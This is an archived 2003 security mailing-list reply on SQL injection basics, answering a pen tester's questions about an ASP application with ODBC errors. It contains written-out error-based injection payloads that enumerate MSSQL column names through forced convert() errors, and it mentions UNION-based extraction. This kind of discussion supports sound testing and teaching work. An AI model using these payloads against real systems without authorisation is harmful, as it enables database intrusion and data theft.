WebApp Sec mailing list archives
Re: SQL Injection Basics
From: NetNinja <netninja () hotmail kg>
Date: Sun, 9 Feb 2003 16:21:46 +0600
Hello raul, Sunday, February 9, 2003, 7:21:47 AM, you wrote: rjhc> I am pen testing a webapp and am having some problems with SQL injection. rjhc> The app creates an ODBC error. Is this a garuntee of SQL Injection ? rjhc> If I use www.victim/test.asp?userid=sfdsd rjhc> the error is "inncorrect syntax near line 28 of test.asp" (or thats the English translation equiv in my case). try inputtin single quote " ' " and c if it throws back ODBC error. rjhc> I know the database is called master, and has a table test. What is the syntax I should use ? well u can try enumerating columns of ur TEST table like this www.victim/test.asp?userid=' select convert(int,(select top 1 name from syscolumns where id=(select id from sysobjects where name='TEST')))-- this will try to convert nvarchar value to int and throws back error where u will c first column name of ur TEST table. then u proceed further www.victim/test.asp?userid=' select convert(int,select top 1 name from syscolumns where id=object_id("TEST") and name>'put here column name returned from previous query')-- once u know column names u can try to retrieve data with UNION or with select convert() something like that... well u can check out some great papers written by top sql injection ninjas like Kevin Spett, Chris Anley, Cesar Cerrudo and others. interestin to read paypaz. :) check out owasp.org rjhc> What are the best freeware and open source tools for testing SQL injection ? rjhc> I tried WPosion which was OK. heh, havent heard of that rjhc> I also tried WebSleuth (which seems to have gone from GPL to closed source commercial btw). Am I right is saying that the SQL plugin has to connect directly to the database to work ? I can only rjhc> see port 80 so don't think this will work ? rjhc> Thanks, Raul. rjhc> Concerned about your privacy? Follow this link to get rjhc> FREE encrypted email: https://www.hushmail.com/?l=2 rjhc> Big $$$ to be made with the HushMail Affiliate Program: rjhc> https://www.hushmail.com/about.php?subloc=affiliate&l=427 -- Best regards, NetNinja mailto:netninja () hotmail kg
Current thread:
- Re: SQL Injection Basics, (continued)
- Re: SQL Injection Basics dreamwvr () dreamwvr com (Feb 11)
- Re: SQL Injection Basics Sverre H. Huseby (Feb 11)
- Re: SQL Injection Basics Alex Russell (Feb 11)
- Re: SQL Injection Basics Jerry Connolly (Feb 11)
- Re: SQL Injection Basics dreamwvr () dreamwvr com (Feb 11)
- Re: SQL Injection Basics Jerry Connolly (Feb 11)
- Re: SQL Injection Basics Ken Anderson (Feb 11)
- Re: WebSleuth and the SQLInjeciton Plugin Chip Andrews (Mar 10)
- Re: SQL Injection Basics Kevin Spett (Feb 11)
- RE: SQL Injection Basics Patrick Debois (Feb 11)
- Re: SQL Injection Basics Jim McGarvey (Feb 11)
- Re: SQL Injection Basics Mark Curphey (Feb 11)